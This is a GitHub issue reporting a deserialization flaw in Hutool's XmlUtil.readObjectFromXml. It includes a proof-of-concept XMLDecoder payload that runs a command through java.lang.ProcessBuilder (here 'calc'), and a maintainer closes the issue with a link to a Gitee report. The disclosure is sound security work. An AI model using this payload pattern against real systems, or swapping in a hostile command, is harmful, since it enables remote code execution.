Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

XmlUtil Deserialization vulnerability #2855

Closed
S2eTo opened this issue Jan 13, 2023 · 1 comment
Closed

XmlUtil Deserialization vulnerability #2855

S2eTo opened this issue Jan 13, 2023 · 1 comment
Labels
question

Comments

@S2eTo
Copy link

S2eTo commented Jan 13, 2023

Desc

Hutool provides XML utility classes that may be vulnerable to remote code execution when using XmlUtil.readObjectFromXml to interpret untrusted XML strings

Detailed

The program will call XMLDecoder.readObject to parse the XML string, causing a deserialization vulnerability

cn.hutool.core.util.XmlUtil#readObjectFromXml
image

Attack

XmlUtil.readObjectFromXml("<java>\n" +
        "    <object class=\"java.lang.ProcessBuilder\">\n" +
        "        <array class=\"java.lang.String\" length=\"1\">\n" +
        "            <void index=\"0\">\n" +
        "                <string>calc</string>\n" +
        "            </void>\n" +
        "        </array>\n" +
        "        <void method=\"start\"></void>\n" +
        "    </object>\n" +
        "</java>\n");

image
@S2eTo S2eTo changed the title XmlUtil deserialization vulnerability XmlUtil Deserialization vulnerability Jan 13, 2023
@looly
Copy link
Member

looly commented Jan 15, 2023

见:https://gitee.com/dromara/hutool/issues/I6AEX2

@looly looly closed this as completed Jan 15, 2023
@looly looly added the question label Jan 15, 2023
This issue was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
question
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@looly @S2eTo